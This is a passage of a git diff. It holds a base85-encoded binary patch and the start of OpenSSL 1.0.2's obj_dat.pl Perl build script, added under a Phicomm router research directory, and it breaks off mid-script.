zvr{*`DUQxT?6k$vd5oQo;XQG54r6B^j?Qn`85%woM<>rt^rP;;Eq{CbJv%YO6XNJh
zu#*zUeqLoKZFp83o#WZbi=(p+zh7Q3yd;j!GIlEB=p@*w8eSJi=QMVj;^=&gotEJp
zadggRrzeiiKJ4@jABv-MK09M^bmp=%`JkWf*k6y{W7|5UqjL#632}6eWhZHPS{$7#
z*vX2c<9}`=XLvyzoom=BiKFvH?x$>cRUDmfvQrmF=PGs@hPTAg`7S#hadf`NPS^0h
zI68N+GZaVXA$CTF`^Q!CpI7f=C$^n?W4HYE`zLn%;{%1BlzHsuL3YyO*w0JsWDL)V
zqw{li{Ntwh^L>+@qRgZ3y)2H-6YNyQF~9Dn?!>KH;P0n5#L;<%ot8K{+i>1LZh_yY
z_pZ#N^Bg;UaddWJXJGh99Gw^0iEQr<-16r;haLa>>!JJKBZs5&8aw{?q5b?kc2Ys#
zyZ`-Q-+7CjTrmG>cJhW7#j&5YcXlUkmBn%SEM=!+cugFg_1S5NqjL^B{`V>U`|G_e
z^XP2CPFEbAud~xLd?1d_2iX~kqjLj0<G}BrM`ySpxBTTiot?NiIzQ#S|GfnNe*J=;
zl6mZB2X->z==_fJ*}#YNyf`|$vQrdC=Vi{90{1_+R1rsKZ+2?p=)B2J-SDP3ItQ@R
z7Ds0T{`^hH@SZq2hq5yeM<>b7(D1Q1I!Ch;<<C3#>t!!?VumNg(V1W;C64_Z$&UZI
zMc?<Hm3efIXD2U?&WY?43@?eJvy7dJI67ysQ#HIUj?QW9G{w=mjGdO@{^zIs?c!{9
zdcpiH?DP#Eieo?LvojXQeja4UKk%i$oV~|VZpbaapG(+Dh@<mcc9Mpt#j&3&*vX2c
z^D;X*!wcf*T*FRD9G$iK^Gs#KtK#T<lbyOaIv-%CVR%a%o$s>K5l3eycDjc5#nHKo
zouN27{^#39hEM%Lu(z+T``Gc{xAfQV;oMK0_j8Ay6vuuZWG5|-{d|U<jNv(PbbiiG
zK^&ds?D+4G`Tck=%RD-LcB<m&e3_k^;SF(ge$P%z9G#okX&c@ZN9V8X^u^J6fSrNi
zBXM+IW+%e?Z~W!(6gyGF{r&owN9PT8lEM6|?4%6Oh@<nakGT`Ka^iTu*5S{e<qa>2
zqq816WpQ-2V5eeuO&py~*lCEPvn@MK!`tHMe2|^4I68Z=(=&V^j?Q#;M&jrk#m?C9
zD8H`s*Vhj0#KqBB$d13i%6~j~Psu#?vnx9padb{)Cu_LBKf~{5Z+42o{Dth446le|
zKL@Z=6UTn8Wv6a<QyiT`*=dWTb2~d7!+YZB9L>%^93B62nM1?J;^<7U6W!SzxaF^x
zr?{V(;R$hcj%Oz&j{UsEPTKISI6BMN$%~`27Jt65V0cL!ozvK<h@<m<cB+Qg#nCyN
zou)WCGuUYv-VsOVe0F-`=*(uv|2yC>fA2$?N9PiD#^UJAV`uUYLAqn#@gC#b`P;=6
zJWhzC<A0ttX?R*3`?-e4S#fku;eK+47sS!|CXY+v=$yk&+3>13I^X4ST^yY{I}O8I
z;^^GP<Bm8wx3JSSyf2Q<eLNnDqw^znMut!Ru@E=sudfF=7u&@l9i1oGi5s32$9{g!
zPFftDSJ=rIo)bss33dwN=&a436D=BE7Dwk9cB<m&yq}$#;SF(go@1vkj?N5r28NHs
z(Rq=b$gb|dEq^<j#ZJ`lxHvkmv6B?Xe*DiFrwq@Cqw^L!IdOEBb3b{*i{j|4&G)k`
zj?RVbR1B|)qq9Cc4RLg?W2b3&TO6HD*y)O+b2mFZ!w2H%e2|@yI64oqGd4V$c0+FY
z+t+k<;^OE$#!kZUlsNXY13MXUbpFat*6_SII=iw{6i4SD?34_zh@-PNJ2i21*5uCt
z*9~uqqjLZ|ZE<uqVW$)Lbb3!5okQ6fh@+F{{4j9;^WS4}bdF{xx|=(2%im7@&xOYV
z|0MefadalwNr_`WOF5qod?h_Aj*kC)mlsFpY|a+~KbKw-N9Sbjry`EdrJSz@egnNO
zj?NkEG{w=mkMpg-AEbB0(fJ}fJ#ln?#rb~Vf1nS=(YcVFu{b)faenfTRJmh+J+75-
z2X4i7pL*_Zr(a<wA&$;wiK)3{;2))@#j&5O*~yBdvp45+h8M)q`6fFhadhUeQ#QOR
zj!ui6x;Q!qvC|0r2zpB#o$s^L5l3f&^IgOH;^_RCouN27i`f|&9@)bUx#h2~2iS>;
zqjPEkQ|{;Z0zWq~$&sWu_VW-sX>oLJ;Cv?Vo9H=lbRJ=+Adb$rIbRI?R(e?+ok!WJ
zilg&A&esCJo8Aydr^il99G&|(-wym|^sYEMkFnDiN9Qrl4+8JgN8;!_!A@kBJ8;Y2
z9{-S-Jd8vGAJOCD=sd+vQXKnvlk=&--?gQCrCS+sbe>@+Cyvg0IiC-FV|q~>oj<Ts
z7DwlUoUa7FHN7T|&U5TE#L?NF^G(Cs;^_R1ovt`KGui0{z88HUj?RnhjKtA7i1XvX
z52r`>bVF{f=AO`bg`K!KI>&H65%>f>C63OU>}15zS;qNn;HT2_;^?f+uiJ{^=zNy*
zCBtihe}VJ$z^|k?#c{qH@O<0iINv)s-!Z%=j?Of82IA=4%g!+H2k2vQbmHtp_i_hr
zt>&K4d5ZHf!xQ4@Y{^ba9G&ObNeBK<dR82rZP>|+qce@a|4=ZzB#zFG>{P_j*@~U2
z;dOCzc4Mb0j?Omhv;yCQ-VsM<7CSw0bdKbFKk(z}LveKWW@jvp&Y7H#?ClQR^4H^e
z^q4q0`?8Y|N5_BsCk@XAegpft!2R#Z6vT19b9lZbah&fD*eM%c6-VbFcIx8jJjhPN
z@Rm3_hq2QUN5}sjPS^0hI68TDhT`bF$o-5Ak7V4CTe!Z^nP4ZDaR+Ys>+yAV;+aYQ
zKb{mv=XiF~;@Ho-_<JT9!*k;3EMuo2j!ul7qTyw6bWUTZDvr)(?9>czh@*2hJ1uc^
zwq~bocvl>q^V#W(qq8GB1H(t+=v=~1WFL3nmcPDcu@f~sE{@I>>?FmppSkR$0zZPD
z5l820c5>qA9MAcD;4A1wadf`PPFWnCvpHW0{LA#3I65tM8sg|&!TDz3*VEhL=zO1@
zt~fg1<$N#jAJ7Nl==_+SkvKXJa(*26WAy00Zpf|G+!Hzvu@e_Z=NZl?0{<I5C63PH
z>}15zd5!bgz}MjK7v;s#`7Jv|adg(_d@1nF=oN8v{>)BI9G&T$uLr&py(x~)i|n+;
z(b=2xoxnd%?}?-1?_V2;qjNOphk-AkkHyhhjrZ?FXS)L&yC-y(aXuFKne>D>I`3g8
zC63PdoKFXSB|R&S&W7yd#nHKy^M$~FN-v3{voSjrade*Id^PZY(Cgype1M&%I6Cj+
z??JT!PtrT$=xoJKPaK^L=lg~a#nIW8ov}DNbJ&UO=MLQR*Q58CI6B+0lMqMeKz5Rb
zr^V6Pft{>4ItR0pGrS;<&Mxef#L+pNowDIoadh@#r!J1paqKh<Z;7LG06QIVbk1a_
zYj|HAog6zuada+ZXJq)~AK`X${`2Z5*on<?NJq#2-eBDDq&W6-EIVm&bo}obW(?1X
zqqBsaf;c)q{)jtqt7v#x9Gz3ysfwfXC_6R78{+8r``=sQ==_GAw&7iIbiTy>^u^J6
zmYsp&BXM*tXD711J8;Y29{<Kp)bO}CI#;uk6vuu>?4%6Oh@<1buaFZ*=Ph>fh8M-r
zxsCfNi=(st*6zfuis3bJbnaoNA&$<b>@*E;i=*=ZJ6&;fwr8hj_&^*T|NWAYI68Z>
zGd4VWfE#kl-%fwS{lvx5na57T@RT_A^G9|v;^-`7Cu?|K9G$<jQxr$%Bz8)MSH#ir
z-v_FRqw{%o>Vcn2Z;GR{I=>Im7Dwko&UXy&iKDYFI|Ffau4QK!_>J_jI651%6V18<
zxBTt&4$j96Pl%)AzrU3d$9}%gPTKISI65EYe)8hz_}}|27+w-bXJ>XQ;^;ia{ZtLF
zi=(p_J56zPo@A$Gct;!^|9!ijI68k|r*HUB9G!XG&sZEC|9j4n1KojJ{(AHt6G!J5
zb`s*~_}`088lDzM=Qwt<;^?d~-JQ6VGrS;<j{kmSNgSOG*eM%c6-Va`?x!w}&X(*n
z3~z~}a}GNladcAbbPex|qjNDkLveKWVP|A`<RCZXmjAr!zt0*IN9Ra(;)W;1v7hU>
zpR_nS6YOLR&xxaR3p)jIbe6DFG`uX1&YkR3#nJgJJ2k@_;^_GAAGgHOxsaW<;azcb
z{)hYNi=%TnI|IW<;^;iiPUPe6z%74!yosHt;c;<ve#cHy9Q(PAos{7jadiCm#dG55
z{D7Uj;YD$D{+IhHi=*>Xb}EL~#L;<!orX9%zhI|ncv~EuwRU$WZgs`cd6u1?;RA7W
zV(g5>(RqoTvEk9VZpbZvJAFSpadC9kNKTGL5{9S5v7fEj$%vz~0Xtd4^Wx~tV5caK
z&UAK4hF8SV@ju5<6GvwjJ9WdG;^^$l{j|l=@sE$tF}x>^&Rli|;^-{meujpR#nCy6
zo#?^tz%73}UCvI-@Ps%z{^v7N;@Hpm?4%9PilcJ^_mdY#=W=!mhL^<AS;<aC9Gz>}
zsTy7vN9S|wG{w=mjh&X^9dUI0&z<zd(eaNT(Kmc3j?QJ=&sZFt-*G>YL)?K|{(AHt
z6G!JNb`s*~_{X708lDzM=SFt2;^@4={p1WUh@<0wo~9&@&g$E^6SvBSSH;n}oBOGY
zqce@2hT$!7bna)TBaY5C>~sU4N$-oJ^B_Azadh_J{K)Xgp>D`6|9SOcc4Fe_9L!GK
z@T55Q^GkNp;^=&uos8i*adiC8EfvJkS;<b(@Ul2M&u~9gada+Xr)GFV9GyS2(-KGL
zT6Wrocg4~93p<gVJ8;Y2j&5cr8u)GWxHvk`vy&8$IsXOcQ-ME4&xoV*cXo2(==_EA
z`M_VH7sb(eiJh`II%|K_ow!voye5v$E9^AH(TTCsG`ua2&TH&+#nIV}onGM6=>u_e
zUT0?{j?P}39~&M$%niBaZ(nb+6BkFvKTb-*@RT_A6XDNwWyH}riu=hLo)<@FO?Han
z=qzHVWOzj!ohUmsadcL&Q#ZURj?TL5w8hc!kMq(oyeE!MjGcivIu~$1L&L}7=uBfL
zI?o-r<!`57WhZ8MLL8kqJ1KGO=Vo@&hG)gm*_@rcI68N;Q!u<Fj!uG|ia0tyXQyg-
zT^yaQ*lCKR^Bg-Z!#m>WB-!bSqw^L!eZz<1=xoQ%SR9=Vwsj|1hfh88*Q58CI65hI
z65{A=#ZJ=jv^Y9Dvy&A^XGeB&h8M)qNwZTDM<>Hh+3>13I<wfRi=%TGI}O8I;^<`9
z>4>9qEIVDp`{L;A$Ieh3ot5m2438Y)hTQU>SF`NI#L+pQow(si@o8>;E<0&)biU3`
z#_*gtIyrU<;^^GMPSNnPI66nLQx!+&N9@!LZ-}FlXQw5O&ac>M8{QR1=NNYS;^_R9
zoq^#aadZmoM2>U^Zu#5ezuAcz9v4SvAv;NN>}S30P<6Ls!!zRO6xqp%qw_&_@`e}1
z(OJSySsa}dI~Bug;^>svX^5jUo1LcNZE<u~veOku=V*3%h7ZKiDYG*YN9RO##)e0a
zazk$U+v!>C#KqA$i=BkwDRJzl!cImUor~GY8lD$N=Nxv5;^_FtpDGz%5l5%WPE8!0
zJGh^^;Z1RLE@Y=Ij?T~6=@{M<N2kWlKpdUlu`@J$ERN3Q>_m@t2X6V>=}YXy3{Qxo
zQ)ee7j{U5$J*w{CH^Z~y=v>84UL2jx*eMuZ5=W=OPDLD@o!F@wUKdB_8|*a2(K(Qv
zmf;<7bein+#L<~xr*HUB9GzR(8H=N{f}Kd-9k}JMNAEFlbXx2r#L+pIouuJuadhrr
zCo7K5SJ}xKUJys8%}z-i9sf9DWy7oD=-k6jT^yZzxSxjMEpc=@>~zG@d5E2^;eBy*
z?q_Exj?VAd85th=gd1|pe_rjf6B9@0AMC^pPl{td53`dNM`x`W?!>K(;W=@1dh8U$
z(b<HZqTyw6bRK7?Dvr)J?9>czh@;bIrzMV#|GVUE!@J_>Jk3sD9GyeBpMl{cadZak
zL_X;b-14_a|M$D2hR4Ox`6D|?aqQ=G?k8n<MjV|XJ2`Q5E@CHdcu^dk=h-QXqjN1g
z6~k-d=#1EDh@*2SJ59se;^@4>PFEbA2iWNuJ`hJ|%+5$0ohR5C8y@|X8*<CvPTycB
zE{@J~>?90NiDN$z{@zzc9G%zM$r_#)M`ulTisI<3w}U%zt7LdZ9GxgTHF0#dWT$R;
zQyiUj*=dWTGn1W;;XQG5V(bjW(b<okq2Xh3bf&QrJ;oil<!`4)vJ*2rA&yR*os>BC
zvzVQ<;aPEXHfJX<j?U-UDHvW7M<>BfMI0Uf_h+ky*TvD<ik+r7IyZ4YEyFwF=p@<c
ziKF8mXRvShP#m4@*cpqX^Emet`LsK5%U_S)W8&zf*hz?^<Npq6((tr6Iy<wI6-Vba
z?k8t>K^&blJ0)>+qA7RcR@v~XI6AY~sf(ktB|8nnTjJ<s*y)I)vnM-U!~5ds?8nYf
z9G#=s83leEJ@Oeh<d*-unq?;@j?U?vj|YA}Jt>a;%w;Dnj?Oil&lsK)M<>TlK^z_b
zIE+QZ%i`!9!A?~ioqM^Tn&Ay`bn@)9#L;<}op#{Argz2BIfk9SI68ml{J`*$I64J(
zA`|YwEq{CbH#<?o<KpNnWG5+({cNx!s_u4dct#wZB0D*8bUwsR-teM0I!o9oi=(qM
zI~Bug;^>svX^5k95Iar7+v4b~WTz{R&N1xt3?GQ2Q)Xu*j?Rhfj17+#+>l%Tc6t^&
z@xmmpy57%XCt-L>9Q&!TlM%;$zQRt{@Vq!W=de>0N9Wt@lnk$kqf=$4CXP;rox0&o
zada+Zr!9`oFWKoB-V;Zs#?C+-ofp^{8a@_B=W=$U^WA}4{&xC0JF&puGjnP#A&yR+
zos>BCGoABk!?WV(T*Xda93B66wF-e}*)NHs(_p6}j?OWhuNqz#N9P;tG{w<5iJg|=
z9dUGSVy7pL&YA4=4Ihf5^Bs1^;^<t&PUKj3;MQvHNj)Zx&h6|Z#4&$8J4wUS;^?&5
z$%><MCp$UA3*zYfke!k^I{tA{%Z69Q(fKhub#Zi_;(i)|zesP1qw^p;9dUHl*vXx^
z)eU?DdS4u!N7xyPqw`_Tj{@I?9$A2MdHeI~W9-Dl(eaO?8V~%F>?FmppC{Q#i=%Tg
z=QDwSk)9Jr=NWbi;^<t-`J&-vadiH~PE{P8@32!dydjRxU)X7hqvQYXM%(bNI65z|
z(-%kQN$zK0_(&X`m)MCcbO&zv+oS*c6j8(D;^_Q?ouoMS^D6g~GCU)W&Oh17iKDa5
z&hEsmyx~Q0blzmAERN1*>{J5Zie3{(XZ1bZiCYbEbhhVw)9|)9I`3hpD~`^-?DPWn
zk5@Yi{1DEM1OE&?zQ{%0^4H^1dLr;I(Np5n+}mx)eP+b5&l@?P4ctHOdR`ozY3vlm
z(eaN<TMGQw>{rCm*@B&#I6D92d_C~BKIUHORy*(w>7Bs+<I)ZS-=6csz;~xdkDEFl
ze>opOj|F}NJr($TdOGl>^nBoF(hGt6$EB?V{uRzw1HYQy4BS61ZYyyAc(uL2zt2uT
zaR2zR<G_E#`N;AAdAa?8o(TLUdNS}aJuQxplO#V*vf}tSS!<W6^UE1t5JzWQc1q&t
zY`{+0@TxdEGuWw%qvIbxw-NZ(?6<_x`4~GLadh_Md^d3ac$Ix|boOLtD2~oTc1D4p
zN{<xXkX!gTM`sQ@F>!Rh!1;LKm(i2r=p4*WS{$8kaXu6H59v8^baLzz#L@W~=Zk?q
zPA`k2;~y8SDvr+coUaA`8oeQo&V25tC63PeySfv%+JV2H-W5mZ1a|u3=*;B&An-lu
zBXM+AuoGGA4&3seua4w=H1K2SadC9cVkaq%{Vd>oD)1BN8F6&ZWhW<&&dHq52VSNZ
z#nHK#ow7JO{&9gSfuF}tO&pyo*lCEPa}np8hPTDhX|U53N9P81dWH|g(YcnLkvKZH
zu`@P2dV(8r%im7F!A@Kpojch{7@iWxer{wZBaY6!>|_nki=%TBJ4JDHe#1`5@QOG(
zx3W_cN9S2~>V`MP(Yc$Qwm3R}Wv63!PaK_}urm-x=YQE58a@_B=V5lDC%OZ-{O$Bj
zc4CGn#L;=2os>BC6HTM)?!PxYD~`_7?BvDK*^r%r;U#f&{>V;69GxxLsTy7vN9TEV
zn&Rke!%oZajyO86u+tMqXJ>Z$h7ZNjd4rv?I68Z?6ItR8-166>_n0_3Ywk5U7D<Ss
za}Ya8!_(sEtjkVT9GxTC$r)Y{M`s#4C2@2L?34|!ilehRJ9Tk%PGqNHcuO3et=Q>^
zqvIb(rE7R!9G&gh8H%IxdG2Rqc;qBE<d*-ux-&a5ada+ZCvJFB9Q&EYPFftDE7-{x
zo)brBKXwY@=v>E6(eSc3I&;~nilg&wc4~$<#L+o|ot8K{{_)(~hIhr$Ifk9SI66P!
zeg=k*#L-#EPGqS&aLeBwA7v+Mcw8KvCF~@{v7bIWDZ?}3=$y<>P8^+Q*~uGT6i4S&
zcFN-DJkL(W@R~R}XR^}}N9R>`nufQ<(eaP3+7(A9vKvm^|N9Leh@*2Z_cIbl=RNF<
z4UaCvxx9Tl{SrHIadf7!lQ29bj{RK1PDUJ^E!fE#o)<^wa(0U1=p@-G8D0@b=WFcL
z#L=0_PTlaPI67Ce(-uc(7CRlod*bL^&(1&`o&DJv8a@_B$3L!awB!!l^0(6*J2Ar(
z;^=&v`$>t%oPUy?wBcECbZ%oOFOJSab_#}<#L>Bnor*X*OWCO!UKdB_9(J1I=#<%M
z8Qu{`=SS@H#L@WzJAK24;^;iU&R86s3)zXB><--W*Q58CI64oplMqMetL!8VPm81D
zA5S?ej!uJ}oZ$s=bbiJCl*G~b7CU9btK#VVhMl@NI(M+sFuWy>&NJ+E#L>Bzovz`1
zadiI3&QKhkE;}Q`Bg@^8TmI{xzpxV%N9UL9#0^i1V?TdqCoPW7)9hpn&xxb+GCKuv
zbpFgv(eSc3I{tCAtK#U4*r^%b5J%@t?x!V=&g<;74eyGhv-;ld#I3$KI&1De$&rEK
zBXM-rW+$>@>h1jPaWi(JhR4OxS(lxpIQBD>os{7jadb9dCnt{1f$ZcBFN&kHF*{{(
zbo}FTR1B|)qq7-14RLf%<9?ckx5d%%kDuNZN9SU8dWH|g(fJ7XGZIJV26o1VM_0Nb
zxBTt&qwK`R(Yc46gyAXiX>NW8b~57VJkCzm@Vq!WJF`<1N5?;IK*{imI6AwrQxivL
z%{|<STlK)#qc_FT*^8aFI64W=cLLvm-V;Y>Uv>uK=<Lt=Vc<v8$KvSBVJCWuJ8;Y2
zPEY21Ebz1Gsld;prvvxDKa~&sO3oJo_rJeW630IM<NjB~@&5jhooe8Z((B^r9M1Q*
zDUQxFoNop0e-6JRj?QP;>4~GW8o&SB5Bz=fp*T8=*%^zY^I^_MPIU)v`Rm31JZ(%I
zos-!~h@&%yon+ug(bMASoX$>G9G&Aip9|doTwFmMozJsV5=Z9(cFKW&on943=K^->
z;^^GW`9|RP&|Bi@T*^*I93B7jC*8pP&u<I^_dmBV3VaRTFBdz_Mcwk(*GBYs;M3{p
zz;~l(0{=L@5csF*#lV-*tAT%>UJLxc=&itSptl3Rlin4_<@_~X&V6xQ&JS{a5O|+H
z5=ZA+b|PhW;FiBU|HAob;IGr;;^^GOPEs8ES%+UQr2^lYo)JgqR(5jY=p4lPeBcY{
zMR9cQV5cmOj=%q*68IJD)Wp%bi=D1GI=6DZ7x<m@fjByMvy(a99k}H$=O1uB8~FY7
zyf`}k@0S$Cv7bjcUkd!!^olq-{_maC#L@BpAE^iK|2|Dq9GxEDueLZkFY$akfxk}g
ziKFBH&dNX>oi*4W2JXLJ9gCwg;C%E9ci@)4oHwG!0{<XAA&!p!`z|SQ>}MO!rvu-U
zo)t&O|2>$zI667b7XtVH-j&4B`6uTq;^>@4uNqz#M`!hnJ8`Qij?S0ZX$5`-y(5m!
zdou3Ct)4hKH*mgh_)r|3_hsCPTVru_{Kt9Z%*j`;x*om9#L@XcW@;`Wj*kDhN*bOP
zM<>ZnRvew@_<rRKFNmYFBReH=bY5krY<N{1o!!}~i=*={dc*LRI6AXA-w{V=b9&eC
zzBoDuaegR{j(>kghDXkFLvG>rh|Xadcj8t|938*UxZz20bUu-BCvK(1(K#{$b-zDk
zcupLh`58>R|6huub9@Hses9C@vN$@6GnjTir!S7q=^3c|d3nPd;^>^5!L<859&vQe
z%|PAvTMX}tqvOxFFOJUT8F%8=!0?ecI-k#A+O5w{J@cPeug^>!M-7jQqjLf0lj7LV
zZS<7k8F6$j<$O*YogdNjh8M-r`5NcT;^_Q>UNO8Tj?Q(QZ-}GwdwSFGwm3RBbG|E%
z&fn-g!w2H%+{*cpI6D8Jj}4E0&JDTcZ>M)=CJ!TVadh6ICj$TQK2!54aqQ;@oX?1(
za}ejVfiI!w#nJKCZ&4hbOF3T({7QO79GwR<?!>K{I660Tz8?5}^rkpEk7V45TWxW4
ze#!Yx;7`$e;^;h<aVKsK#L;<y^TWVjp^wGUc{1Zp+=`w(^?Wt=44pOiojQ&Mz79Ph
zj?Ocgsri&RI-7DnZFoNLtvFu@e0zFH9OwHdo^M4Q=esxOtAXd}b#Zk3?WHM>&O*+&
z0x#1$;^@4TaVKu|#L>Bk^ZmfDp%2B;c`f5k+!~9ca~tO)6}<NCuUEatDwDkG_V{LI
z>Np{e&J*k;4Nr?>KWp;iCo7K5YwY9<FNmYF4m%}rbf(RACvKH1lh0Ot{pP(Yj?Vko
zsf(kt3p)+NTjJ<!%1%cdox|Db8r~O2C&A889Gx;dBf}$~cSCNi=AO`*&Q44mo&RPh
zZg^50of+(;#nJgOI~l`s;^=&goq{+z&#_Z9yey8+EOx5m=uF$sow!vqydjRxY<61W
z=<LHz+wiV9I{x30zBoE3urn}xB#zEu`?wRVFHAjK%{@cse0HLS$Hmd{e}6G4j?OLY
zqzuo9qcg$%<iyeW1v`1ei{j`U$4*%sombhZ7+w=c=OlI-;^=HP$DO#<G`ua2&PsN=
z;^@p~r)T&;9Gx@S8HuBFB0FQlqhEAGZms5?(D?#8adCA1i=BkwDRFczU?(Gv&TZ^u
z4bO|C<Nv;9Q5>Bo*(n)b5l80=?x!Y>PGo<axbLSJ-V{gYYIfS<=uBs)V|Y&-og3I0
zh@*2DJ43_A;^^GMPV^ji;MQvH37s?9i5Z>{N9T5SQsU@b#7^4qtT;M%vy&G`=Q?%@
zhL^<A`4Kx6adhrrr)qdz93B7nQ=8)G{EVGe;7`*#;^_RG`{{|J^Csu}fv<Idd!<`L
zade(wXDp7+7Mzcqi?@3FdfbK{6G!J6b`s*~%;tPDaQ}D0(&Fem$4*upoh#VM1%5BR
zAdb$9?3BdOd6Dzwz~7s7uXL*_j?QcB)Wy-+h4YQT_n>zI&(OPp&!zXpalUWye23yV
z--VnX1@8YYSL8f5<ko8L37zP^IC8f^adggMCm#6K^rSdC{{JIsadd9ye8%vcI6510
zKLv4g?qjEDcv&2sjoGP+qvQYXSIzK-I6D6SO)YVBe#iZ^4eyGhvpM(E7f0uLb_Rxz
z#L@X6JCXC<fm^s9(OLUI9J%Y$@VGcSA7Updj?O0Rqzuo9qw^7Va^mQGn4P@gMR9bJ
z?3BgP*^`}$;Wcq|wq>Uwj?Pi+G!1Wyqcek@t~ff!vePqsAdb$C?2N?GIfI?C;nAua
za?9UNcV;Ipj?RVbBn(f9V?VpHlMzSfT6VIA=f%<4ot>gMI^SofWOzj!ojuv9iKFuf
zJ9WdG;^_Fl&)pVB=P&GZ4DX4fGn@Mvh@<2GKHSjou{b*WvlG3*9k}Ihr>}B9F~bw$
z=p4vSN*w!H;~-Ss{pW^f#nG9|PF@_Hb=WBwUJ^&=P<ATf=)~En8eSJiXC6CEadeXG
zv<&ZvqjMxXJ#ln)VW)5SP#m2+J7aNl4q+$qC3oPKzaG8E#L@W_I|*@gitHo}Pm81T
z8FsSb=zNx)oZ$s=bmp^D5=ZA!cFKlV#nJKiztzRjxq+RA;Vp4=j^}<l;^^GPPS^0h
zI65b=GZaVXes)HNN51Ta-147SPhuw~j?Uxk#0^i1V?QN!(&Fe0*~u856GvwSI|Xrc
z-e9L_cv&2sQ`xDCqqFA6-HBT@!yDr0oX$>59Gz+Gv;*Ii-Vb~W`XKP_=p%8Q?>Ri*
z$c65}Eq}X9b3PjQ{`9ywI{yCNq&W6JkMk+RGvercmHWwwqqB&eeBdkSMR9ce{mf-?
zbk62{CGd;rHF0#B+)qOsov(4eX?R;4om<)IilcK2JH5c~rVqr?xtpDlI64n-ejNDY
z^yo!y$Sr?+{0Td8adiCOiA)%t632cXW+x+#&dWUCY~XLvi-E5**S(QjrNB3#*8=}A
zy&m`u^mgET&^w0r#PNRpitpDz9Pihm><kSbi=#7OCwj3vaLeDm7O)dDJRy$G-`Gis
zV?U>{lMejL^sG2Kud<UDN9Q`u7Xtq#y(Es#>+Dp-(Yb~5)xhtf*TvCUW41eSt0|7o
zk2v27{1JLD@F(g0!2d)a2mTU0a>?Y`uex6TO-}^A&cRc2$-uXyX9M4ro(ue7dMWS)
z^m5>*)9Zm>LT?2Ab$Ux2m-D*3oIB#UoWH^OZs51m`{L+q#LiG0oqISxGCWdqLvH!c
zKbx}?6G!J^cH)L7#j&4{u#*-?=V^8_hUdi5nZZs$9G&OcDH>iDM`u@ds^aLp!A{Na
zhB!JIc3R@-tb2$%ajR{3R~(%K+3Aa;vpG8h!$;!i%ws2VsXK7Xe;(V8ov7h)adbY#
zPEs8EnZ-`Z@QgS*3)#tuqcfMCyx~Q0bWUQYERN1G>{JY|iKBBWI}LGkmax+_ye*E-
z+3a-1(K(Bqp5X&=bgJx(#L>Bsow4E3%iNG#{&spPJ8^Mzu3{$<_&4b(aqQ>o>}15z
zxsCH#!}H?kT+dEX9G%D6DH&c7N9PuHYU1dO*{K`e6i4SacG}|TY<{RaajRo^PaK^#
zI|Ffa{NHCC8a@_B=U#TA|K$$c^0(84+)vE#gg83)vy&3Xe!k33+VHG6I*+iE7f0s~
zb_#}<#L;<-or*X*zh$RtcwHQwC)sI=qqA1dow(I9yd#dzGwk%l(b<8WzTxA*cjtWM
za-93y*O&K1;0JL&8ThgEY~W|mbAew*F9rTBdO7eP)9Zo%hTaJLuk@DqH241fiI-bP
zJcjrCFueEf`*MMANbifI^CCM#adfuh{3!6f=#j7BT;Bft_D^<V;^-XB`FP+9=}B?y
zXN~<(b@vmBqf_R5Ch+s<IdOE}%T7TYoohH>4E#IvvN$?%cB<m&Jj(f6;7`*V;^=&s
zorHTCYjr+N9=Ma8`GWU#d7KM;TOKbA{5l?20^c5=xZJvY>e;IE-G|-`{0#a%fnP=M
z1%40xkAXi;e<ScC@eaBb<LmwVTcqz7_~vU)%^wr^|Ik+ke%8CD<}VC9wbqnB9{5&k
zPx&zL6n*jnb0dDAf1uChe!cI!&Qxb%;D4r{6?mOj@Ew8w_j|d|z#pY=zQ)w+@oGF>
zzuwewWX6iqPg*(uSoeJ8@~P)V|I+eBOXkm5xv0D{GGpQVmGdJrj$N@LGGqBN9AJFM
z89Vwz_Z-8MuW>KAp&3h-EttO~GGoEAlTKQ+)FqZKTe)b)0f!v9{fd?I7o5oB<CmT?
zqqKZkY0>hPr?auBIC0$a`6n&n{{BCoCEVNND&p0+s+QqPzgd43O}@aZa}{ppUc!e=
zW|d66kUMB<vd8NQ7bhgjxj3J1P3Of=bzh(0lYv|OaGW}LhvV&>p&7n?f^W}ftKQz9
zzlR;&3)t684}9+5{uO@S@vrvpzki-_ufWUvu<~P(#IaK^?y%n~ntUPgpNA3rw+n9{
z?!R#3)L@IB@BEu3{0n@Zb<f}F@=qK!wZqiArk>;S$4$(?|NinXIKxEBJ?V<gntD6`
zdC|XaN~hiiw%9#+^D}t92j5-|FNd@E^)Kuzy!<kJ`-FR)F28?om%10w4Bx)Mx6cI^
zZ20yUy0?9&%P;q-sbZdCTz>e};@{q1e(!YNZY<K;d+I&S@$(vPMjv>Gw|}>@V2e)N
lI$-MU4-Q^ArBfp~-M~EsBa^ReetK%-S56+ieG<O?{{teqSWy4~

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/objects/obj_dat.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/objects/obj_dat.pl
new file mode 100644
index 0000000..86bcefb
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/objects/obj_dat.pl
@@ -0,0 +1,307 @@
+#!/usr/local/bin/perl
+
+# fixes bug in floating point emulation on sparc64 when
+# this script produces off-by-one output on sparc64
+use integer;
+
+sub obj_cmp
+	{
+	local(@a,@b,$_,$r);
+
+	$A=$obj_len{$obj{$nid{$a}}};
+	$B=$obj_len{$obj{$nid{$b}}};
+
+	$r=($A-$B);
+	return($r) if $r != 0;
+
+	$A=$obj_der{$obj{$nid{$a}}};
+	$B=$obj_der{$obj{$nid{$b}}};
+
+	return($A cmp $B);
+	}
+
+sub expand_obj
+	{
+	local(*v)=@_;
+	local($k,$d);
+	local($i);
+
+	do	{
+		$i=0;
+		foreach $k (keys %v)
+			{
+			if (($v{$k} =~ s/(OBJ_[^,]+),/$v{$1},/))
+				{ $i++; }
+			}
+		} while($i);
+	foreach $k (keys %v)
+		{
+		@a=split(/,/,$v{$k});
+		$objn{$k}=$#a+1;
+		}
+	return(%objn);
+	}
+
+open (IN,"$ARGV[0]") || die "Can't open input file $ARGV[0]";
+open (OUT,">$ARGV[1]") || die "Can't open output file $ARGV[1]";
+
+while (<IN>)
+	{
+	next unless /^\#define\s+(\S+)\s+(.*)$/;
+	$v=$1;
+	$d=$2;
+	$d =~ s/^\"//;
+	$d =~ s/\"$//;
+	if ($v =~ /^SN_(.*)$/)
+		{
+		if(defined $snames{$d})
+			{
+			print "WARNING: Duplicate short name \"$d\"\n";
+			}
+		else 
+			{ $snames{$d} = "X"; }
+		$sn{$1}=$d;
+		}
+	elsif ($v =~ /^LN_(.*)$/)
+		{
